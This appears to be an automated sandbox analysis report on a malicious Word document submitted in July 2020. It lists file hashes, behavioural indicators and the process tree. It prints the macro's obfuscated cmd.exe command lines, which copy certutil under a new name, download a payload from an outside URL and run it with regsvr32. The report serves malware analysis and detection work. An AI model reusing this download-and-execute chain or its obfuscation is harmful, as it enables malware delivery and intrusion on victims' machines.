Analysis
-
max time kernel
135s -
max time network
133s -
platform
windows10_x64 -
resource
win10 -
submitted
28-07-2020 19:08
Static task
static1
Behavioral task
behavioral1
Sample
document,07.20.doc
Resource
win7v200722
Behavioral task
behavioral2
Sample
document,07.20.doc
Resource
win10
General
-
Target
document,07.20.doc
-
Size
110KB
-
MD5
30511605bee5a35ff80fde0de0105bd4
-
SHA1
8c5f42a5142a86e0ac4819f34340ac7e6ea498a2
-
SHA256
b156c9ad046d0d4b174f7308bd3b965f4425b1dfa38e7dc19e6e1eb54b0b49a1
-
SHA512
fe953141f28c7aaa59c478fb497170882ed578076d2b9e483f02b309484aa6b4447d0aa6104ef1b38efae8691740ab42b5ddca8adfd66013b7f1094042d7e623
Malware Config
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 1540 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1308 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
regsvr32.exepid process 1308 regsvr32.exe 1308 regsvr32.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
WINWORD.EXEpid process 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE 3932 WINWORD.EXE -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3832 3932 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1540 3932 cmd.exe WINWORD.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WINWORD.EXEcmd.exeregsvr32.exedescription pid process target process PID 3932 wrote to memory of 3832 3932 WINWORD.EXE cmd.exe PID 3932 wrote to memory of 3832 3932 WINWORD.EXE cmd.exe PID 3932 wrote to memory of 1540 3932 WINWORD.EXE cmd.exe PID 3932 wrote to memory of 1540 3932 WINWORD.EXE cmd.exe PID 1540 wrote to memory of 3788 1540 cmd.exe 1.exe PID 1540 wrote to memory of 3788 1540 cmd.exe 1.exe PID 1540 wrote to memory of 3004 1540 cmd.exe regsvr32.exe PID 1540 wrote to memory of 3004 1540 cmd.exe regsvr32.exe PID 3004 wrote to memory of 1308 3004 regsvr32.exe regsvr32.exe PID 3004 wrote to memory of 1308 3004 regsvr32.exe regsvr32.exe PID 3004 wrote to memory of 1308 3004 regsvr32.exe regsvr32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3932 WINWORD.EXE 3932 WINWORD.EXE -
Executes dropped EXE 1 IoCs
Processes:
1.exepid process 3788 1.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document,07.20.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
PID:3932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe2⤵
- Process spawned unexpected child process
PID:3832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\ProgramData\1.exeC:\ProgramData\1.exe /urlcache /f http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp3⤵
- Executes dropped EXE
PID:3788 -
C:\Windows\system32\regsvr32.exeregsvr32 C:\ProgramData\1.tmp3⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\regsvr32.exeC:\ProgramData\1.tmp4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1308